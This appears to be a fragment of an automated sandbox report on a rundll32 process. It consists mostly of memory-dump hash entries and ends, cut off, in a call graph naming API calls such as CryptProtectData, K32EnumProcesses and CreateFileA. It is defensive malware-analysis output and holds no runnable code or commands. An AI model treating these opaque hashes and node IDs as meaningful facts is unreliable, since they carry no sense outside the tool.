                                                                      • Opcode Fuzzy Hash: dad5a6672e5302f114ec75944ed99a296b02beb5bb3a59fae38fb1a84eb9b8cd
                                                                      • Instruction Fuzzy Hash: CA016536B001288BDF148AADDA103EEB7F6EB88315F04817AD505F7254DB39A945DBA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3cb366afb517f67652a6aa32da7dbf1276caeae842114b751b3f444887a3d4b1
                                                                      • Instruction ID: aac9fc67afbfaa6c62283e134f5621c7e0243027813ac674836c131ce9d2e557
                                                                      • Opcode Fuzzy Hash: 3cb366afb517f67652a6aa32da7dbf1276caeae842114b751b3f444887a3d4b1
                                                                      • Instruction Fuzzy Hash: 072104B1D002498FDB10DFAAC584ADEFBF4FF58324F148419D519A7240CB756945CFA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fb845958f4a63e3e77bd4ea7b315ae48c5f81d294e33a3be9f216df1a4f50b7d
                                                                      • Instruction ID: fcb819e98924ac0c461eeeffd245063afba6ad0495ed55c848e682e78d1cfb48
                                                                      • Opcode Fuzzy Hash: fb845958f4a63e3e77bd4ea7b315ae48c5f81d294e33a3be9f216df1a4f50b7d
                                                                      • Instruction Fuzzy Hash: 00119332604214BFDB05DFA8D459AAABFB2FF8C320F114029D80A97380DF396C45DB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 130aa1bb7835663c061c5a1a5327569c583eb95673ad1c68ad9c26c4d59178c8
                                                                      • Instruction ID: a0729c8fc7cb9ae26eb2e107f06dddd308df8e5379d7c411e36e04d816cd5258
                                                                      • Opcode Fuzzy Hash: 130aa1bb7835663c061c5a1a5327569c583eb95673ad1c68ad9c26c4d59178c8
                                                                      • Instruction Fuzzy Hash: F801843A3101108F8B08DA6DF49486EF7ABFBD8261314807BF609C7310DE72EC128794
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f230caf4df4bc1ee0fafa58768e92683bd18afcb9cf13af9f30f9bf5214a7f87
                                                                      • Instruction ID: 0434139c017cf634d5415c2c7bb05edd1f15b40bd9d16cafd4ada02e45944985
                                                                      • Opcode Fuzzy Hash: f230caf4df4bc1ee0fafa58768e92683bd18afcb9cf13af9f30f9bf5214a7f87
                                                                      • Instruction Fuzzy Hash: 430147267102300BFB191B3CAE053A92F868B9A704F0080EAF905CB792DDE0EC877391
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b5ccbe8f6389edab42bb4c2cc2001cf89b48172be5c860ef8badf79b97e7a5d3
                                                                      • Instruction ID: a81c4f63f35805161e2a4fe8115ec2096e4660e6f5b44e1ce4bc41e9820f175b
                                                                      • Opcode Fuzzy Hash: b5ccbe8f6389edab42bb4c2cc2001cf89b48172be5c860ef8badf79b97e7a5d3
                                                                      • Instruction Fuzzy Hash: 5811F4B1D046498FDB10DFAAC980AEEFBF4FF98324F148419D519A7240CB796905CFA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8fc88dc8dd4a3632a175a0e875a1f2831e6b180c76241daa188f187be285ca69
                                                                      • Instruction ID: 723590f8aa84985317aa7f882e552d63f066b2463030ae8042bedc3d7ca4bf7b
                                                                      • Opcode Fuzzy Hash: 8fc88dc8dd4a3632a175a0e875a1f2831e6b180c76241daa188f187be285ca69
                                                                      • Instruction Fuzzy Hash: 71114F32604214BFDB05DFA8D459AAA7FB6EF8C320F554029E40AA7380DF796C45DB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fca36afb7fb8e69c67ec0817bd6f345e4286e412d0a2ea756661bd786b32a1f3
                                                                      • Instruction ID: 942f5450671de8bdafccb446606ff61fd4d968a70dfadd11c6f37a3bebaaf4c2
                                                                      • Opcode Fuzzy Hash: fca36afb7fb8e69c67ec0817bd6f345e4286e412d0a2ea756661bd786b32a1f3
                                                                      • Instruction Fuzzy Hash: FE01D23070521497EB58AB7DC61439F7BF7AFC8604F20806DD40AAB390CE755D0687D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c3dc709f107d97fd84165de70659178ef9ab4e5f052d58a6f27b15b68f95c4cc
                                                                      • Instruction ID: 10e60ff681b478df2c429ca38ac495263a86d52c2ad5c0a4486bcc501062bb62
                                                                      • Opcode Fuzzy Hash: c3dc709f107d97fd84165de70659178ef9ab4e5f052d58a6f27b15b68f95c4cc
                                                                      • Instruction Fuzzy Hash: 81F0AC32F862305BFB1517BC5E613BE6752EBD1308F04846AC6099F2E0EA26B443B380
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0088b1dae6458adeb153b0c7200584ea14e07c648eba9093996cc095f84768e
                                                                      • Instruction ID: d06b50e011dd2d4e365c5e4e66faf998dfb040d99e7a2e9dbd2e72175c034018
                                                                      • Opcode Fuzzy Hash: a0088b1dae6458adeb153b0c7200584ea14e07c648eba9093996cc095f84768e
                                                                      • Instruction Fuzzy Hash: 9701DF31B0521497EB18AB6DCA147AF7AF7AFC8604F20802DD00ABB390CE706D019BD1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1353811368.0000000002E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E8D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2e8d000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0e2fbb88d5ef281240c2cce1648d811f53be00c90775073d7bb2e9e4c806da05
                                                                      • Instruction ID: ede25fe20683b7a90aee7fc64fb07881ee4ad232ab76dbd5de3e4cc9c8a6c1ad
                                                                      • Opcode Fuzzy Hash: 0e2fbb88d5ef281240c2cce1648d811f53be00c90775073d7bb2e9e4c806da05
                                                                      • Instruction Fuzzy Hash: AE012B71448344AAE720AA36CC84B67FF98DF41328F08C51AED8C4F2C2C3799841CBB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1353811368.0000000002E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E8D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2e8d000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d377db2173a3a08f41c39244ff575aaab731aff1291b834af82d730ba1fc6853
                                                                      • Instruction ID: af004b928cc0281013c6a5984cea0d77318824052e40afc881ec64999341a267
                                                                      • Opcode Fuzzy Hash: d377db2173a3a08f41c39244ff575aaab731aff1291b834af82d730ba1fc6853
                                                                      • Instruction Fuzzy Hash: AC01006244E3C09ED7128B358C94B62BFB4DF53224F19C1DBD9889F2A7C2695849C772
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7b58d799583c4435cab05fc4f532d9ad2dc5fd58565ff89caba2efb00d7106c5
                                                                      • Instruction ID: 5d5b423be9105220cc66a6e70aaa673b4eddf9d6e9541cfe41614240dce9de72
                                                                      • Opcode Fuzzy Hash: 7b58d799583c4435cab05fc4f532d9ad2dc5fd58565ff89caba2efb00d7106c5
                                                                      • Instruction Fuzzy Hash: 68016D31B0412597EB18AB6D86957AF7BF79B88704F10446DD506F7380CE716D01ABD1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fb926e572e1c5876e3001f53d2892b9d34e24f1d86cc575385017fe928a77231
                                                                      • Instruction ID: e820c1cffa5e4736065e875e304a9f11cc306e25de523ed7a7d8c84e02121974
                                                                      • Opcode Fuzzy Hash: fb926e572e1c5876e3001f53d2892b9d34e24f1d86cc575385017fe928a77231
                                                                      • Instruction Fuzzy Hash: 6BF0B431300310478721AA6EE88149BBF96DBD8670300862EF5098B300EE61EC0547E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 36add38afb36a1cca717d649fad8caa840cc571105a6cd7f85f055ce74760f30
                                                                      • Instruction ID: 8741a3414870ca36994d7b2e47b46ad13f84edf54acf1a283283309049c357a6
                                                                      • Opcode Fuzzy Hash: 36add38afb36a1cca717d649fad8caa840cc571105a6cd7f85f055ce74760f30
                                                                      • Instruction Fuzzy Hash: 87F08231300310579721AA6EE88189BBF9AEBD8660350852EF50A8B300EE65FC055BE1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6c3a1f346c56cabcd0da4e7c33a49c9eb89eb1f922d0faee792920a3dd4b2adb
                                                                      • Instruction ID: 7a0f6899c599c36dc0254cf5d5c62c9a37734c43d7c66fff9c3b239e537a8d64
                                                                      • Opcode Fuzzy Hash: 6c3a1f346c56cabcd0da4e7c33a49c9eb89eb1f922d0faee792920a3dd4b2adb
                                                                      • Instruction Fuzzy Hash: C1E0C27730E6542A6369218EBC418C3BF6CE6D21B532A027BF348C32129453280642B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e963ad029099453cf4d827e5c7c9af62e4cce10468f3aa0572f1b4d6b634653e
                                                                      • Instruction ID: de9ca73134cc9803089591263e6baf2cf67666c50ece93019df3326ab3b9d925
                                                                      • Opcode Fuzzy Hash: e963ad029099453cf4d827e5c7c9af62e4cce10468f3aa0572f1b4d6b634653e
                                                                      • Instruction Fuzzy Hash: 23F0E536B093404FD7165A26E810697BB669BDA225F2480BEE14CD7396D9369806CB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cb790bb28eaee8c6da1c65925a3fd224cc97c09162b575f49e93d22db305ee52
                                                                      • Instruction ID: a307ad772cab409046cb8dc7e1efebe3b0792ba0a708396d259892a210b30d64
                                                                      • Opcode Fuzzy Hash: cb790bb28eaee8c6da1c65925a3fd224cc97c09162b575f49e93d22db305ee52
                                                                      • Instruction Fuzzy Hash: 12F0E2B1D08309EFCB85DBB4D8060887BB5EB0520470186D9E809DB212FA315F519B91
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e33529472c6e97f37b4e80617093c42928ce0ba5cfafd32f6f0d688aa057d98f
                                                                      • Instruction ID: b4fb78db391ffe45a2ab6382059ccf9de73697d209091a3c79559bf724e42167
                                                                      • Opcode Fuzzy Hash: e33529472c6e97f37b4e80617093c42928ce0ba5cfafd32f6f0d688aa057d98f
                                                                      • Instruction Fuzzy Hash: BFE07D327002044BC314A92BE840967F7AFEBCC724B20807DF10CC3355DD72AC02CA90
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05b5268c8902cfc5317e3c2ebfbd1827621f4fc9c71ac26ed5adaa15b24cbe04
                                                                      • Instruction ID: c5bc412eb17018333710dc7a57c92ecd8bdd508529eff992091b5b24317f848f
                                                                      • Opcode Fuzzy Hash: 05b5268c8902cfc5317e3c2ebfbd1827621f4fc9c71ac26ed5adaa15b24cbe04
                                                                      • Instruction Fuzzy Hash: 74D05B57E5527057DB06197C22453A56759EB55024F0188E2EE0587542E8689D1713C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 241276c3a5fe67b00b68c684c956dd4f421666428229536b0618fc79d910220e
                                                                      • Instruction ID: e9dd67105cf6e05f6cc7a71440d8ea09b526f8af7d1504d58deee4ae6c815153
                                                                      • Opcode Fuzzy Hash: 241276c3a5fe67b00b68c684c956dd4f421666428229536b0618fc79d910220e
                                                                      • Instruction Fuzzy Hash: C0E04FB1D491489FCB00EBA4ED5159CBFB1DB56210B0084E9E819DB242E9345F059792
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 039d1dbb4a3bed6255c9885a4061b4a4d688f4af3e9c696ddfe4614d17a28434
                                                                      • Instruction ID: 8d02a7dd725179e260f36a912620569b23116a56bc29c33d11bd1a3b8820381a
                                                                      • Opcode Fuzzy Hash: 039d1dbb4a3bed6255c9885a4061b4a4d688f4af3e9c696ddfe4614d17a28434
                                                                      • Instruction Fuzzy Hash: 91D095333192244FC304D7A8F44A5547F65E7541107004037F60447370CD705C61C7C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a5962de54469b053740d43965bfe436053af2ac9550d365f21cb429cfa48964
                                                                      • Instruction ID: ffedf654aa8354e26a1350bb76eb034b6d06024aced2e02161faee641311afeb
                                                                      • Opcode Fuzzy Hash: 2a5962de54469b053740d43965bfe436053af2ac9550d365f21cb429cfa48964
                                                                      • Instruction Fuzzy Hash: C1D0A73331422C6B5600661DD98986A7BE9E7A83603504437F90187620DD617C10A796
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3375bcdcfb0d8defc11027e1f7262e2701dccfc2da77fb87795ee07150cb5e29
                                                                      • Instruction ID: fd7afc6e6a5833e9f4574093846b50a159c1a8e01faaec38995f4a973f916fda
                                                                      • Opcode Fuzzy Hash: 3375bcdcfb0d8defc11027e1f7262e2701dccfc2da77fb87795ee07150cb5e29
                                                                      • Instruction Fuzzy Hash: 31D05E70A4510DEFCB00EFB9E90159DBBF9EB84204B1085E9E80DE7201EE317F009B81
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72ce094fecd733b7d9acdb660a91275e49389d005eaab21ddf92c6008ed4691c
                                                                      • Instruction ID: 361ebba82acdd279bf47cded25c52142b890e211a34ec4ecf17302721d87b3b5
                                                                      • Opcode Fuzzy Hash: 72ce094fecd733b7d9acdb660a91275e49389d005eaab21ddf92c6008ed4691c
                                                                      • Instruction Fuzzy Hash: EED01770A01209EBCF40EFB9E90155DBBBAEB48204B1095A8E80DDB200EF316E50AB81
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000003.1352477383.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_3_4a20000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c13d2a8a7945e2db5ef3559b34e5981d2d002301e1f32e8972f78155e4d4e33d
                                                                      • Instruction ID: e5219fb14386873de6f572b3b1f975bd9d6439a79a1092bbe5f5297f62aa4f81
                                                                      • Opcode Fuzzy Hash: c13d2a8a7945e2db5ef3559b34e5981d2d002301e1f32e8972f78155e4d4e33d
                                                                      • Instruction Fuzzy Hash: C3C08CB3A2066087D1144608018DAEA73A0FB3032AB84C0AAC2040D010F2331013D969

                                                                      Execution Graph

                                                                      Execution Coverage:11.6%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:3.2%
                                                                      Total number of Nodes:277
                                                                      Total number of Limit Nodes:21
                                                                      execution_graph 43711 1c81238 43712 1c81249 43711->43712 43715 1c80e24 43712->43715 43716 1c80e2d 43715->43716 43717 1c80de8 43716->43717 43721 1c836a0 43716->43721 43729 1c836b0 43716->43729 43718 1c81282 43723 1c836a3 43721->43723 43724 1c836cc 43721->43724 43722 1c83664 43722->43718 43723->43722 43723->43724 43736 1c84c6e 43723->43736 43725 1c83764 43724->43725 43741 1c8e5e6 43724->43741 43725->43718 43726 1c83739 43726->43718 43730 1c836c6 43729->43730 43735 1c84c6e RtlGetVersion 43730->43735 43731 1c83764 43731->43718 43732 1c836cc 43732->43731 43734 1c8e5e6 4 API calls 43732->43734 43733 1c83739 43733->43718 43734->43733 43735->43732 43737 1c84c90 43736->43737 43738 1c84cc6 43737->43738 43739 1c84d1d RtlGetVersion 43737->43739 43738->43724 43740 1c84dda 43739->43740 43740->43724 43742 1c8e614 43741->43742 43744 1c8e62e 43741->43744 43742->43744 43749 1c8eaa8 43742->43749 43753 1c8ea99 43742->43753 43743 1c8e674 43757 4370be2 43743->43757 43760 4370bf0 43743->43760 43744->43726 43751 1c8eace 43749->43751 43750 1c8eb06 43750->43743 43751->43750 43763 1c8eb50 43751->43763 43755 1c8eace 43753->43755 43754 1c8eb06 43754->43743 43755->43754 43756 1c8eb50 3 API calls 43755->43756 43756->43754 43758 4370c15 43757->43758 43794 4370c2c 43757->43794 43758->43744 43762 4370c2c CryptProtectData 43760->43762 43761 4370c15 43761->43744 43762->43761 43764 1c8eb8e 43763->43764 43772 1c8f788 43764->43772 43765 1c8ee2f 43766 1c8edb7 43766->43765 43776 4370a48 43766->43776 43780 4370a3a 43766->43780 43784 4370ad0 43766->43784 43789 4370a00 43766->43789 43773 1c8f7b3 43772->43773 43774 1c8f7ac 43772->43774 43773->43766 43774->43773 43775 1c8f930 3 API calls 43774->43775 43775->43773 43777 4370a6d 43776->43777 43778 4370510 3 API calls 43777->43778 43779 4370a85 43778->43779 43779->43766 43781 4370a6d 43780->43781 43782 4370510 3 API calls 43781->43782 43783 4370a85 43782->43783 43783->43766 43785 4370a73 43784->43785 43786 4370af2 43784->43786 43787 4370510 3 API calls 43785->43787 43786->43766 43788 4370a85 43787->43788 43788->43766 43790 4370a0f 43789->43790 43793 4370a44 43789->43793 43790->43766 43791 4370510 3 API calls 43792 4370a85 43791->43792 43792->43766 43793->43791 43795 4370c4d 43794->43795 43796 4370c59 43794->43796 43795->43758 43800 4371230 43796->43800 43810 4371238 43796->43810 43797 4370cd5 43797->43758 43801 437125d 43800->43801 43802 4371324 43800->43802 43801->43802 43806 4371230 CryptProtectData 43801->43806 43809 4371238 CryptProtectData 43801->43809 43820 43714eb 43801->43820 43824 43714f3 43801->43824 43828 437148e 43801->43828 43832 4370f48 43802->43832 43806->43802 43809->43802 43811 437125d 43810->43811 43814 4371324 43810->43814 43811->43814 43815 43714f3 CryptProtectData 43811->43815 43816 4371230 CryptProtectData 43811->43816 43817 437148e CryptProtectData 43811->43817 43818 43714eb CryptProtectData 43811->43818 43819 4371238 CryptProtectData 43811->43819 43812 4370f48 CryptProtectData 43813 437154d 43812->43813 43813->43797 43814->43812 43815->43814 43816->43814 43817->43814 43818->43814 43819->43814 43821 4371529 43820->43821 43822 4370f48 CryptProtectData 43821->43822 43823 437154d 43822->43823 43823->43802 43825 4371515 43824->43825 43826 4370f48 CryptProtectData 43825->43826 43827 437154d 43826->43827 43827->43802 43829 43714a3 43828->43829 43830 4370f48 CryptProtectData 43829->43830 43831 437154d 43830->43831 43831->43802 43833 4371738 CryptProtectData 43832->43833 43835 437154d 43833->43835 43835->43797 43494 60b6188 43496 60b61bc 43494->43496 43501 60b61ac 43494->43501 43495 60b61b5 43502 60b62f8 43496->43502 43509 60b6308 43496->43509 43497 60b62f8 4 API calls 43497->43501 43498 60b6308 4 API calls 43498->43501 43501->43495 43501->43497 43501->43498 43503 60b632d 43502->43503 43505 60b633d 43502->43505 43504 60b6336 43503->43504 43531 60b5710 43503->43531 43504->43501 43516 60b6488 43505->43516 43523 60b6477 43505->43523 43510 60b632d 43509->43510 43512 60b633d 43509->43512 43511 60b6336 43510->43511 43513 60b5710 ProcessIdToSessionId 43510->43513 43511->43501 43514 60b6488 2 API calls 43512->43514 43515 60b6477 2 API calls 43512->43515 43513->43510 43514->43510 43515->43510 43521 60b64b2 43516->43521 43522 60b649f 43516->43522 43517 60b64a8 43517->43503 43518 60b661a K32EnumProcesses 43519 60b6652 43518->43519 43519->43503 43521->43522 43534 60b571c 43521->43534 43522->43517 43522->43518 43524 60b642e 43523->43524 43528 60b6486 43523->43528 43524->43503 43525 60b64a8 43525->43503 43526 60b661a K32EnumProcesses 43527 60b6652 43526->43527 43527->43503 43529 60b571c K32EnumProcesses 43528->43529 43530 60b649f 43528->43530 43529->43528 43530->43525 43530->43526 43532 60b66c0 ProcessIdToSessionId 43531->43532 43533 60b6733 43532->43533 43533->43503 43536 60b65c8 K32EnumProcesses 43534->43536 43537 60b6652 43536->43537 43537->43521 43538 5a72100 43539 5a7211e 43538->43539 43541 5a72137 43539->43541 43544 5a72251 43539->43544 43542 5a72251 CreateFileA 43542->43541 43545 5a7226d 43544->43545 43549 5a72cc8 43545->43549 43553 5a72cd8 43545->43553 43550 5a72cd8 43549->43550 43557 5a707f4 43550->43557 43554 5a72ceb 43553->43554 43555 5a707f4 CreateFileA 43554->43555 43556 5a72160 43555->43556 43556->43542 43558 5a72d28 CreateFileA 43557->43558 43560 5a72e5d 43558->43560 43570 5a72fe0 43571 5a72ff2 43570->43571 43572 5a73036 43571->43572 43574 5a7340f 43571->43574 43575 5a73425 43574->43575 43576 5a738e0 43575->43576 43579 1c87490 43575->43579 43583 1c87481 43575->43583 43580 1c874ba 43579->43580 43581 1c874d5 43580->43581 43587 1c8f930 43580->43587 43581->43575 43584 1c874ba 43583->43584 43585 1c874d5 43584->43585 43586 1c8f930 3 API calls 43584->43586 43585->43575 43586->43585 43588 1c8f963 43587->43588 43590 1c8f953 43587->43590 43588->43590 43596 1c8f930 3 API calls 43588->43596 43599 1c8a4c8 43588->43599 43604 1c8a4b8 43588->43604 43609 43748e3 43588->43609 43615 43748f0 43588->43615 43621 1c8fab8 43588->43621 43589 1c8f95c 43589->43581 43590->43589 43597 43748e3 3 API calls 43590->43597 43598 43748f0 3 API calls 43590->43598 43596->43590 43597->43590 43598->43590 43600 1c8a4f9 43599->43600 43601 1c8a4ed 43599->43601 43600->43601 43602 43748e3 3 API calls 43600->43602 43603 43748f0 3 API calls 43600->43603 43601->43590 43602->43601 43603->43601 43605 1c8a4f9 43604->43605 43606 1c8a4ed 43604->43606 43605->43606 43607 43748e3 3 API calls 43605->43607 43608 43748f0 3 API calls 43605->43608 43606->43590 43607->43606 43608->43606 43611 4374924 43609->43611 43612 4374914 43609->43612 43610 437491d 43610->43590 43614 1c8f930 3 API calls 43611->43614 43612->43610 43631 4376730 43612->43631 43614->43612 43617 4374914 43615->43617 43618 4374924 43615->43618 43616 437491d 43616->43590 43617->43616 43620 4376730 3 API calls 43617->43620 43619 1c8f930 3 API calls 43618->43619 43619->43617 43620->43616 43622 1c8fadb 43621->43622 43623 1c8faeb 43621->43623 43624 1c8fb2c 43622->43624 43627 1c8fae4 43622->43627 43629 1c8fab8 3 API calls 43622->43629 43630 1c8f930 3 API calls 43622->43630 43625 1c8f930 3 API calls 43623->43625 43624->43627 43672 4370006 43624->43672 43677 4370040 43624->43677 43625->43624 43627->43590 43629->43624 43630->43624 43632 4376770 43631->43632 43635 4370510 43632->43635 43634 437678b 43634->43610 43636 4370536 43635->43636 43639 5a714a3 43635->43639 43643 5a714b0 43635->43643 43636->43634 43640 5a714c2 43639->43640 43641 5a714e5 43640->43641 43647 5a714f3 43640->43647 43641->43636 43644 5a714c2 43643->43644 43645 5a714e5 43644->43645 43646 5a714f3 3 API calls 43644->43646 43645->43636 43646->43645 43648 5a71518 43647->43648 43652 5a71720 43648->43652 43660 5a7170f 43648->43660 43649 5a71558 43649->43641 43653 5a7172b 43652->43653 